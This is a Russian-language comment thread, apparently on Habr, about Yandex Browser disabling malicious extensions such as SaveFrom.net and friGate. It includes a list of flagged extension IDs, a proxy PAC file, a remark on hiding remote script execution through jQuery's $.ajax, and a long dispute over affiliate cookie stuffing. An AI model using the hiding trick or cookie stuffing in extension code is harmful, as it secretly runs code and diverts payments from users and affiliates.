Comments 508
acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
aonedlchkbicmhepimiahfalheedjgbh — Помощник
aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
eoeoincjhpflnpdaiemgbboknhkblome — x3
onbkopaoemachfglhlpomhbpofepfpom — x3
inlgdellfblpplcogjfedlhjnpgafnia — x3
ejfajpmpabphhkcacijnhggimhelopfg — x3
pgjndpcilbcanlnhhjmhjalilcmoicjc — x3
napifgkjbjeodgmfjmgncljmnmdefpbf — x3
glgemekgfjppocilabhlcbngobillcgf — x3
klmjcelobglnhnbfpmlbgnoeippfhhil — x3
ldbfffpdfgghehkkckifnjhoncdgjkib — x3
mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
mdpljndcmbeikfnlflcggaipgnhiedbl — x3
npdpplbicnmpoigidfdjadamgfkilaak — x3
ibehiiilehaakkhkigckfjfknboalpbe — x3
lalpacfpfnobgdkbbpggecolckiffhoi — x3
hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
gfjocjagfinihkkaahliainflifnlnfc — x3
ickfamnaffmfjgecbbnhecdnmjknblic — x3
bmcnncbmipphlkdmgfbipbanmmfdamkd — x3
miejmllodobdobgjbeonandkjhnhpjbn — x3
х3 — не находится в Chrome Web Store
х3 — не находится в Chrome Web Store
Не совсем так, некоторые из них там есть, просто надо не поиском пользоваться, а подставлять ID: chrome.google.com/webstore/detail/coupons-at-checkout/onbkopaoemachfglhlpomhbpofepfpom?hl=ru
Некоторые из Opera Store, некоторые уже удалены из обоих сторов.
friGate3 proxy helper удобен…
Сообщество, что вы используете для удобного включения прокси для определённых сайтов?
Tor полноценно поднятый на хоумсервере в виртуалке
+.pac файл где сказано что на .onion — ходить через Tor
А потом friGate сливает небось куда вы ходите. Смысл этого.
Например обойти локальные блокировки.
warp от cloudflare
Единственное что прокси надо самому искать, но с фригейта я в своё время потому и слез что пред-настроенные прокси пропали.
Теперь вы знаете, в каком месте расширение Frigate его надо сломать, чтобы оно не вредило. Сделайте из него свой userscript, оставив только хорошее.
А потом еще разбираться как его выложить для всех и т.п. Тоже фиг знает сколько времени.
А вот если кто-то, кто в этом уже разбирается пересоберёт Frigate и выложит, было бы здорово:)
Серьезно, если это просто, подскажите как это делается по шагам. Я бы пересобрал friGate3 proxy helper, но вот как выложить уже не знаю, да и наверное это будет нарушением авторских прав на оригинальный код
Штатный функционал: автоконфигурация прокси через pac-файл. Сам файл беру с antizapret.info — там уже прописана логика включения, и прописываю в нём свой прокси.
в нем можно PAC профиль создать с адресом РАС загрузкой локально и обновлением.
то есть тот же самый антизапрет будет у тебя новый храниться локально обновляться и управлять перенаправлением запросов
at the first glance, you won't find any eval() or chrome.tabs.executeScript() calls in this extension. Don't be fooled, this extension uses jquery library, which AUTOMATICALLY EXECUTES any downloaded script using $.ajax() call. This is documented jquery functionality, but if you don't know about that, you'll be puzzled.
Разработчик FastProxy какое-то время использовал прокси-серверы АнтиЗапрета, без разрешения проекта, и заменял страницу с ошибкой открытия сайта на свой текст. Я включил в страницу ошибки MutationObserver и переадресовывал пользователей на вот эту страницу:
antizapret.prostovpn.org/fastproxy-warn
file:///c:/путь/proxy.pac
сам файл:
function FindProxyForURL(url, host)
{
var domains = [
"visualwebsiteoptimizer.com",
"amazonaws.com",
"tribl.io",
"olark.com",
"linkedin.com",
"archive.org",
"telegram.org",
"telegram.me",
"t.me",
"slideshare.net",
"lurkmore.to",
"upyachka.io",
"protonmail.com",
"anonfiles.com"
];
var len = domains.length, i;
if(isInNet(dnsResolve(host), "5.3.3.0", "255.255.255.0")) return "PROXY proxy.example.ru:3128"; /* обнаруживает блокировку DNS'ом в domru */
for(i=0; i<len; i++) if(dnsDomainIs(host,domains[i])) {
/*
if(isInNet(myIpAddress(), "192.168.0.0", "255.255.255.0")) return "PROXY 192.168.0.2:3128";
else
- можно выбирать в завимости от сети, к которой производилось подключение
*/
return "PROXY proxy.example.ru:3128";
}
return "DIRECT";
}
— github.com/jawj/IKEv2-setup
— github.com/kylemanna/docker-openvpn
FoxyProxy
Остальные — download.master, savefrom.net и frigate (помимо Автоматическое применение купонов
).
acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
aonedlchkbicmhepimiahfalheedjgbh — Помощник
aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
eoeoincjhpflnpdaiemgbboknhkblome — Автоматическое применение купонов(https://savematik.com)
onbkopaoemachfglhlpomhbpofepfpom — Автоматическое применение купонов (Автор: shopscoupons.fr)
inlgdellfblpplcogjfedlhjnpgafnia — Автоматическое применение купонов (Автор: shopscoupons.br)
ejfajpmpabphhkcacijnhggimhelopfg — Автоматическое применение купонов (Автор: caa.newstore)
pgjndpcilbcanlnhhjmhjalilcmoicjc — Автоматическое применение купонов (Автор: frcouponsapp)
napifgkjbjeodgmfjmgncljmnmdefpbf — Автоматическое применение купонов (Автор: frcouponsapp)
glgemekgfjppocilabhlcbngobillcgf — Автоматическое применение купонов (Автор: couponsatcheck)
klmjcelobglnhnbfpmlbgnoeippfhhil — Автоматическое применение купонов (Автор: shopscoupons.store)
ldbfffpdfgghehkkckifnjhoncdgjkib — Автоматическое применение купонов (Автор: sh.coupons.fr)
mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
mdpljndcmbeikfnlflcggaipgnhiedbl — УДАЛЕНО
npdpplbicnmpoigidfdjadamgfkilaak — УДАЛЕНО
ibehiiilehaakkhkigckfjfknboalpbe — УДАЛЕНО
lalpacfpfnobgdkbbpggecolckiffhoi — УДАЛЕНО
hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
gfjocjagfinihkkaahliainflifnlnfc — УДАЛЕНО
ickfamnaffmfjgecbbnhecdnmjknblic — УДАЛЕНО
bmcnncbmipphlkdmgfbipbanmmfdamkd — УДАЛЕНО
miejmllodobdobgjbeonandkjhnhpjbn — УДАЛЕНО
Возможно проект взломан или продан.

Сделайте пожалуйста, кнопку ОТКЛЮЧИТЬ ВСЕ информеры\всю нечисть из дзена\и все персональные подборки.
Почему они по умолчанию включены и так ясно, но не делать умышленно кнопки «отключить все» — это уже издевка (
Далее выборочно юзер включает что ему нужно.
А не выборочно выключает.
непонятных надстроек над хромом
Вот сейчас смешно было. CEO «непонятных надстроек над хромом» — Brendan Eich, погуглите, кто такой; а CTO — Brian Bondy.
ФФ уже лет шесть можно использовать только из жалости к стюардессе, когда нужен браузер «ни одного логина» (инкогнито не совсем так работает, если что).
бодрее текущего хрома
Не знаю, мне не приходилось запускать его на кофеварке; на компьютере я разницу не замечаю.
на порядок свободнее
Чем ядро движка chromium? Разве что, в голове у стюардессы.
как оно работает?
Ну только ленивый еще не видел ни одну из миллиарда публикаций «что на самом деле утекает в инкогнито моде».
Я почитал пор Брендана и не совсем понимаю что именно в его карьере наводит на мысль о том, что он может быть и будет хорошим CEO. Он даже CTO был не оч долго, а CEO — это совсем другая ответственность в другой сфере.
Другой вопрос, зачем ее поставлять в комплекте с браузером. Или, например, зачем в почте календарь и телемост на самом удобном месте, а чтобы открыть отправленные письма надо тянуться незнай куда третьей рукой. Но это всё вопросы риторические.
Извините, недопонял про "Отправленные" — что с ними не так?
зы у меня HomeAssistant (пока) — такой проблемы нет.
решение проблемы подсказал zv347 постом выше. попозже попробую.
поэтому приняли решение отключить в Яндекс.Браузере уже установленные копии расширений SaveFrom.net, Frigate Light, Frigate CDN и некоторых других. Пользователи этих расширений получат уведомление, в котором мы расскажем о причинах отключения. После этого они смогут принять осознанное решение и при необходимости включить их вновь (хотя мы настоятельно рекомендуем так не поступать
ИМХО, тут надо выпиливать с корнем. Всё же, расширения содержат возможность запускать вообще любой код. Кто знает, что сделают владельцы, узнав что «Гипс снимают. Клиент уезжает».
Использование ресурсов компьютера пользователя без его ведома в Беларуси можно рассматривать с точки зрения уголовного права. Обфусцирование кода, подгрузка непроверенных скриптов говорят о том, что разработчики приняли специальные меры, чтобы не связанная с основной функцией деятельность их расширения осталась незамеченной.
Информировать пользователей о «скользком» поведении — плюсую двумя руками, а вот банить — только за действия, для которых вынесено судебное решение, или видно что они явно незаконны. И тут ещё встает вопрос, а по законам какой страны (браузера, авторов плагина или пользователя)?
(а если так незаконно — то например и протекторы (тот же Denuvo/VMProtect) незаконны — обфускация ж, и (тем более) Warden из WoW (и аналогичная штука в EVE Online) — там прилетает код с сервера периодически и смотрит вообщем что ему надо, и отсылает результаты, если заблокировать — в EVE сразу будет вылет)
Да и наверно Win10, с ее добровольно-принудительно установкой обновлений, часто без внятных описаний что они делают.
EVE'овский код вообщем то достаточно безобиден (ну — те образцы что мне в лапки попали несколько лет назад). Там:
— попытка идентифицировать компьютер (хеши MAC'ов сетевых, хеши данных видеоадаптера,etc).
— попытка проверить что в особо интересных местах кода на Stackless Python — находится изначально загруженный игровым клиентом с диска код (подменить загружаемы код — скажем так затруднительно, там шифрование и подписи).
И все. Список запущенных приложений насколько помню — не сканируется (хотя это возможно).
1. Ой, это мы случайно, больше не будем.
2. Goto 1.
Как быть если расширение полноценное не надо но достаточно user script'ов?(с одной стороны — SaveFrom у меня через Tampermonkey и работал на Chrome(в отдельном профиле под эти задачи), с другой стороны — есть куча полезного)
Как быть если расширение нарушает политику конкретного центра но само по себе — белопушистое (ну кроме — прогибатся под стор)?
Кстати а какую именно подпись должны проверять Яндекс браузер и новый Edge? Гугла (они ж могут с гуглостора ставить расширения) + свою?
Хотя как опция — это было бы интересно, как и детектор обфускации
С одной стороны, командой Яндекса проделана огромная и полезная работа. С другой — производители расширений-зловредов, по сути, вообще никак от этого не пострадали. То есть риска у такой противоправной деятельности по сути нет: не попался — хорошо, продолжаешь зарабатывать свои преступные деньги, попался — ну перестал, но ничего не теряешь. Можно начинать с начала. И вот именно здесь кроется корень проблемы. Должна быть хоть какая-то ответственность, хотя бы экономическая. Либо белые списки и код расширения, подписанный магазином. И запрет на подгрузку чего бы то ни было другого. Причём все остальные расширения удалять не нужно, можно их оставить. Но пользователь должен в явном виде иметь информацию, что вот это расширение точно безопасное, а вот это — уже на свой страх и риск.
прекратите истерику — говорят в таких случаях
расстрел без апелляции, боже мой, как это должно работать, как запугивание и атмосфера страха
с вами родители и на работе тоже так поступают?
Ты так договоришься до того, что Яндекс.Трусы забанит в магазине расширений Советник Яндекс.Маркета
Спасибо всем ребятам, хорошо сработали.
Представляю, как мэлварщики ржали, когда к ним Яндекс обратился первый раз насчёт левого звука. "Да-да, спасибо Яндекс, не волнуйтесь, мы сейчас починим наше расширение".
А что свинство? Вы ничего за эти расширения не платите. Очевидно, что монетизация происходит как-то иначе.
Но разоблачительным статьям с хабра, конечно, виднее ))
Но, во-первых, с достаточно многими аспектами я всё-таки сталкивался. Во-вторых, по моему опыту, большинство сотрудников Яндекса — порядочные люди. В среднем ощутимо более порядочные и идейные, чем в целом по популяции.
Так что
Больше сомнений, что ли :)у меня вызывают как раз «разоблачительные статьи» если в них нет никакой конкретики, только общие домыслы.
… не заставляют мой компьютер майнить биткойны. А по поводу остального — погуглите, где приобрести шапочку из фольги на свой вкус.
И уж тогда, чтобы без двойных стандартов и намеков на конспирологическое «бесплатный сыр в мышеловке», «если вам не продали, то продали вас» и т.п. многозначительное бла-бла-бла — меняйте платформу для разработки. А то что же, разрабатываете для Android, принадлежащего Google, поддерживаете непорядочную корпорацию? :-) Будьте последовательны, только free soft, только хардкор!
не заставляют мой компьютер майнить биткойны
Учитывая производительность некоторых приложений G/F, уж лучше бы они биткоины майнили… Любое гуглоприложение на голом смартфоне с Android One или на Google Pixel можно привести в пример.
Ну да, ну да. Google продает инфу на лево и на право, Facebook продает инфу на лево и на право, ФСБ само продает инфу на лево и на право, но Яндекс белый и пушистый, конечно.
Лично вы работали с силовиками? Или, быть может, лично вы отказывали силовикам в предоставлении какой-либо информации без официального запроса?
Я убежден, что после пары таких отказов, Яндекса уже бы не существовало.
- То, что вы называете перехватом кук, называется куки стаффингом. В комментариях тут это уже упоминали в отрицательном ключе.
- Для условного работника хладокомбината, который решил заказать микросхему для своего хобби — перехват кук действительно полностью не имеет значения, потому покупатель ничего не теряет. Но никто и не говорит, что криминал именно в этом.
Вот тут Вы не правы. Алиэкспресс, как и любой другой рекламодатель, платит только и именно тогда, когда покупатель попал на сайт Алиэкспресс (и совершил покупку) после сознательного перехода по партнерской ссылке аффилиата (партнера). Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен. Но если в браузере стоит расширение, которое скрытно установило свои партнерские куки, то это уже мошенничество. Расширение не привлекало покупателя на сайт и соответственно Алиэкспресс не должен такое оплачивать. Поэтому они не «все равно платят за трафик».Для Алиэкспресса в общем-то тоже, потому что они все равно платят за трафик
Запрещают. И не они одни. Не будьте голословными. Это наверняка прописано в условиях сотрудничества с Алиэкспресс. В этом году, если ничего не путаю, один крупный кэшбэк сервис, которым я пользуюсь и вы наверняка его тоже знаете, изменил свой интерфейс расширения именно по причине запрета трафика из расширений со стороны Алиэкспресс. Такое было объяснение и я им верю, что они не сами это придумали.трафик с расширений не запрещают
Такая возможность есть. И они ее запретили использовать видимо не просто так.хотя такая возможность есть, значит их устраивает
Нет, не плевать. Это репутация партнерской программы, раз. Два — если ничего не делать, то в партнерке останутся одни мошенники с неразрешенными видами трафика и с этим магазином постепенно перестанут работать нормальные фирмы. И три, это самое главное тут (вы опять не в ту сторону рассуждаете). Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя. Это может быть блогер на Youtube, купонный или скидочный сайт, сайт-обзорник или что угодно другое. Это их заслуга, что они привели покупателя на Алиэкспресс и они должны за это получить вознаграждение. Но если их куки перехвачены расширением, то это финансовое мошенничество со всеми вытекающими.Кто получит вознаграждение — блогер или автор расширения Али в общем-то плевать.
Нет, тут не так. У вас видимо есть какие-то проблемы с пониманием причин и взаимосвязей. Если блогер делает обзор на Youtube, к примеру, и размещает под роликом ссылку, по которой переходит покупатель на сайт Али, то партнерские отчисления должен получить блогер. Но есть и другие сервисы для покупателя. Например, кэшбэк-сервисы, которые вы упомянули. Они тоже имеют полное право на существование, потому что не запрещены по своей сути Алиэкспресс и другими рекламодателями. Если покупатель с Youtube имеет установленный плагин для своего браузера от кэшбэк сервиса, то он вправе им воспользоваться в установленном порядке. Сейчас — это означает осознанный переход (клик) на сайт Алиэкспресс с сайта (но не из расширения!) кэшбэк сервиса. Если он его сделал до перехода по партнерской ссылке Youtube ролика, то партнерские отличесления уйдут Youtube блоггеру. Если после — авторам кэшбэк сервиса. В любом случае, покупатель делает сознательные! клики по одной или второй партнерской ссылке.Можно с таким же успехом сказать, что кэшбек сервисы воруют отчисления у блогеров.
- А монетизация, про которую написали Вы, как про безобидную — это откровенное воровство денег или у Алиэкспресс или у других партнеров типа блогера на Youtube или даже у кэшбэк сервиса. Я сам на этом попался когда-то. За это дают реальные сроки. Вы просили пример? Задайте запрос в поисковике «куки стаффинг тюрьма» или подобный. Ссылки прямые давать не буду, там много статей в том числе и история на Античате.
На Хабре есть директор Алиэкспресс.ру и представители других крупных магазинов. Спросите их мнение, если мне не верите. Если они ответят что-то иное, я очень удивлюсь. Почему? Потому что я сам имею отношение к не маленькому магазину с партнерской программой и поэтому я знаю о чем говорю.
Вы прикидываетесь или занимаетесь сами перехватом партнерских кук и такими речами пытаетесь приуменьшить значимость проблемы?
Я никогда не занимался монетизацией расширений или их написанием для публичного доступа. Но я сталкивался с подобной монетизацией как пользователь, после чего взял привычку делать все покупки с кешбеком с чистого профиля.
Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен
За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем). Кешбек Алиэкспресс не запрещает. Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).
Запрещают. И не они одни.
Совсем ведь не сложно зайти на Admitad и посмотреть условия программы:
1. Арбитраж трафика. C 15.12.2020 по 31.05.2021 включительно разрешены следующие виды покупного трафика:
Для России: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
Для Белоруссии, Казахстана, Узбекистана: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
Для остальных стран СНГ разрешены все виды арбитража трафика, кроме контекстной рекламы на бренд.
Контекстная реклама на бренд запрещена для трафика из всех стран. Также в оффере по-прежнему запрещена PV реклама (попапы, попандеры, бодиклик/кликандер) с непосредственным направлением трафика на партнерскую ссылку. При желании, вебмастера могут закупать PV-трафик на собственные промежуточные лендинги-витрины.
2. Купонные сайты, сайты-агрегаторы скидок и промокодов.
3. Партнерские сети, инструменты CPA-монетизации сайтов, платформы лидогенерации.
4. Браузерные расширения.
Поэтому Aliexpress это очевидно устраивает.
Такая возможность есть. И они ее запретили использовать видимо не просто так.
Такая возможность есть и они ее не запрещали.
в партнерке останутся одни мошенники с неразрешенными видами трафика
Но они разрешены как видите. Если бы были не разрешены, то такого партнера быстро бы заблокировали и на этом все бы закончилось.
Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя
Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.
В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь в отличие от того что описано в посте или поднятия прокси, как в Hola.
За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем)
Вы уж простите меня, что я повторяю, но вы совсем не понимаете что говорите. Вы повторяете свое видение ситуации, но оно ошибочно, хотя бы потому что вы учитываете только интересы покупателя. А есть еще интересы Алиэкспресс и других партнеров. Почему вы их не учитываете? Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам. Это означает вам надо перейти по партнерской ссылке кэшбэк сервиса. И никак иначе. Нужен сознательный ваш клик. Без клика Алиэкспресс не выплатит комиссию за товар вашему кэшбэк сервисы, а они не выплатят вам.Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).
Не то же самое. И почему вы опять оцениваете все с точки зрения только покупателя? Интересов магазина и других партнеров не существует или они тут не важны? Если нет сознательного клика, то и оплаты быть не должно. Еще раз. Все партнерки платят только и только за сознательные клики. Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера? На Алиэкспресс куки живут сутки (или трое), если не ошибаюсь, после клика по ссылке, именно для того, что бы партнеру не платить за последующие покупки, потому что покупатель уже приведен, нет необходимости платить за него еще раз. А вы, предлагая подобную монетизацию любого расширения, хотите что бы Алиэкспресс платил расширению, которое само вообще не приводило никого на Алиэкспресс. Улавливаете разницу для Алиэкспресс и других партнеров? Не видите тут кражи денег у них? В цене партнерские отчисления заложены, вы правы, но они выплачиваются только тем, кто их заслужил, то есть привел покупателя на сайт Алиэкспресс через сознательный клик. Все другие не имеют никакого права получать эти партнерские отчисления. Если расширение пытается таким способом монетизироваться, то есть самовольно без ведома покупателя подменяет ему куки, то это называется куки стаффингом. Найдите в Википедии и почитайте что это такое.Вы привели условия программы Admitad. Это условия с 3 сентября. Я читал их пояснение к их расширению в каталоге Google раньше в этом году. Видимо правила поменялись. Но вы должны понимать, что речь идет о расширениях, у которых есть ссылки на Алиэкспресс в своем интерфейсе, а не, как вы написали в своем первом комментарии, делают перехват партнерских кук. Именно пеперехват — это куки стаффинг, это не сознательный клик. Если есть сознательный клик и если Адмитад разрешили трафик из расширений, то ради бога. Но вы завели разговор про перехват. А это уже воровство. Не у покупателей, а у Алиэкспресс и у других партнеров. Поставьте себя на место другого партнера. Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси. Это расширение ничего не сделало для получения комиссии, но получило ее за вас. Какой смысл Али платить им, а не вам? Именно вы продвигаете Али посредством обзоров. А расширение-перехватчик ничего не сделало, но просто забрало ваши деньги. Как вы к этому отнесетесь?
Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.
Надеюсь, у меня получилось объяснить и сейчас вы понимаете разницу. В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь
Почему в ситуации, где есть 3 стороны, вы считаете уместным рассуждать только с точки зрения одной стороны и на основании только этого делать вывод о безобидности для всех сторон? Почему вы не берете в расчет сторону Алиэкспресс и других продавцов? Поставьте себя на их место и подумайте со всех сторон.хотя бы потому что вы учитываете только интересы покупателя
Я уже не раз писал что я говорю с точки зрения покупателя.
Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам.
Это не всегда так. Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт. Принцип тот же самый.
Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера?
Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.
Вы привели условия программы Admitad
Я привел условия программы Aliexpress, которая расположена на Admitad. Условия заданы Aliexpress, а не Admitad.
Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси.
Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом». Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.
Есть такое расширение — Alitools, которое монетизируется подобным образом. Они предоставляют сервис мониторинга цен и другие подобные утилиты. У меня как у пользователя к ним претензий нет. В отличии от какой-нибудь Hola, которая поднимает локальный прокси и продает доступ неизвестно кому — это банально опасно. Вот и все что я пытаюсь донести, что для пользователя такой вид монетизации более безобиден. А не для других партнеров.
Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт.Покажите кто так делает. Если они это делают без клика покупателя — это куки стаффинг. Теоретически, кэшбэк сервисы — это единственный вид сервиса, которому такое может быть разрешено делать автоматически. Но для этого нужно обычно отдельное разрешение для такого вида сервисов.
Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.
Кэшбэк — это оплата за человека, который сам приходит на Алиэкспресс, но обязательно сам изъявляет желание получить кэшбэк посредством клика на соответствующую ссылку в кэшбэк сервисе. Нет клика — не будет и кэшбэка. Разницу улавливаете? Тут нет разговора про новый это клиент это или старый. Тут есть разговор про кликнул или нет. Если кликнул, Алиэкспресс будет платить за старого или нового, не важно. Но что бы не платить всегда потом, есть срок действия кук.
Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом»Я продолжну вашу мысль. «перешел по ссылке на Али и воспользовался кешбек сервисом обязательно кликнув на ссылку кэшбэк сервиса». А если какое-то расширение делает подмену кук без вашего клика, то это совершенно другая ситуация. В этом случае вы не изъявляете желание и куки меняются без вашего желания. Это и называется куки стаффингом. Плохое расширение в таком случае просто пользуется вашей безграмотностью. Вам на это все равно, вы всегда тут были правы, но не все равно Али и блогерам, которые работают с Али. Неужели так сложно уловить разницу?
Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.Нормально так вы сделали важность целой партнерской программы неважной. Это чуть ли не самый важный элемент в их продвижении. С ними работают десятки тысяч, если не сотни людей по партнерской программе.
Когда вы говорите «они бы запретили трафик с расширений», то уточняйте какой трафик. Тот трафик, когда пользователь изъявил желание и кликнул сам по ссылке или тот трафик, о котором вы изначально написали — подмена кук. Второй тип трафика нигде и никогда не будет разрешен. Поймите вы это уже наконец. Мне лень регистрироваться в их партнерской программе, но я готов вам отправиить 1000 долларов, если там нет запрета на куки стаффинг (подмену кук).
Alitools никогда не устанавливал, поэтому точно не скажу. Но если они делают именно подмену кук без вашего клика, то они мошенники. Напишите Алиэкспресс, опишите ситуацию и спросите сами. Если сложно с английским, то попросите оценить ситуацию директора Алиэкспресс тут на Хабре. Он может передать этот вопрос сотрудникам на оценку. Если у них есть в интерфейсе ссылка на Али, если Али разрешает трафик по ссылкам из расширения, если Alitools не подменяет куки какими-то способами, то никаких проблем — это не подмена кук.
То, что вы пытались сказать, я понял сразу. И именно поэтому стал объяснять вам, что ваша точка зрения не полная, а потому не может называться верной.
Почему вы говорите только с точки зрения покупателя, когда подмена куки для покупателя не вредна?
Вы может быть не понимаете о чем я говорю. Я лишь говорю о том, что пользователь не пользующийся кешбеком может безбоязненно поставить расширение, монетизируемое подобным образом, в отличие от обсуждаемого в статье или чего-то типа Hola. То есть пользователю с таким видом монетизации бороться не обязательно (если только оно у него кешбек не перехватывает).
Для Али оно может быть вредно и у них есть способы борьбы с этим, которые они почему-то не используют (а именно запрет трафика с расширений (любого, опции «запретить кукистаффинг» я у affiliate платформ не видел, но очевидно что запрет всего трафика с расширений запретит и это), у кучи других партнерских программ такой трафик запрещен). Почему я не знаю, но логично предположить что оно не так им и мешает или выгода от такого трафика перевешивает недостатки. С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.
Нормально так вы сделали важность целой партнерской программы неважной.
Я не делал важность партнерской программы неважной. Я не знаю какими целями руководствуется Aliexpress принимая трафик с расширений. Если у вас есть возможность можете сами у них спросить. Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее. Но я не работаю в Ali.
Но если они делают именно подмену кук без вашего клика, то они мошенники.
Я не знаю как обстоят дела на данный момент, но кешбек сервисы обычно вносят его в свой стоп лист по причине перехвата кешбека, а в интернете можно найти примерно такую информацию:
Каждый раз, когда вы покупаете товар на Aliexpress, данное расширение модифицирует ссылку для получения кэшбека самим разработчиком.
Лично я это не проверял, может быть это поклеп со стороны конкурентов. Как я и говорил, покупаю я с кешбеком из чистого профиля без расширений, а цены через это расширение проверяю в другом профиле, поэтому на личный опыт сослаться не могу.
вот вам две статьи с расследованиями
По вашим ссылкам расширения маскировались под другие используя их торговые наименования, это куда более очевидный залет и причина для удаления. Но вообще вопрос законности я тут не поднимаю, это сложная тема. Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно. А может и нет, я не знаю и речь изначально вел не об этом.
но очевидно что запрет всего трафика с расширений запретит и этоЗапретить можно, но на примере статьи вы видите, что запретить — это одно, а трафик отправлять все равно будут пробовать.
С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.По условиям партнерских программ не за каждого старого пользователя нужно платить.
Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее.
Тут дело не в лояльности покупателей, а в том, что если не платить блогерам и другим в том числе и за старых покупателей, то все эти люди будут рекламировать другие площадки.
Лично я это не проверял, может быть это поклеп со стороны конкурентовСомневаюсь, что Мегабонус будут делать поклеп. Просмотрел отзывы у расширения Alitools. Похоже проблема действительно есть. Отзывы о краже кэшбэка периодически-постоянно появляются. По сути это воровство денег у доверчивых пользователей. Приведенные ваши две ссылки не единственные, где говорят о подмене кук с их стороны.
Но вообще вопрос законности я тут не поднимаю, это сложная тема.Это не сложная тема. Тут все просто и понятно. Представьте, что вы блогер или владелец партнерки и все станет просто.
Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно.Нет, это не станет законным. Более того, это будет самопризнанием мошенничества. Правила расширения не могут быть важнее правил партнерской программы, от которой они получают деньги, и закона.
www.zdnet.com/article/google-removes-two-chrome-ad-blocker-extensions-caught-cookie-stuffing
www.express.co.uk/life-style/science-technology/1319293/Google-Chrome-warning-browser-issue-malicious-extensions
В Chrome Web Store платные расширения вполне себе бывают.
Ну и например за AdGuard VPN (в браузере у меня именно расширение от них — выборочно умеет заворачивать трафик от нужных сайтов на их VPN) я плачу, точнее за сам AdGuard VPN.
Я мог бы с Вами согласиться, если бы всегда пользовался безлимитны сверхскоростным интернетом с восьмиядерного ПК. Но моя реальность не всегда совпадает с таким положением дел — порой приходится сидеть с атома по каналу, раздаваемому со смартфона где-то вдали от крупных городов.
После прочтения статьи первое впечатление от заголовка поменялось с «П — произвол» на «З — забота». Ваша статья — пример хорошей работы с сообществом. Вы молодцы, так держать!
Такая активность Savefrom.net только на хроме или на огнелисе тоже есть?
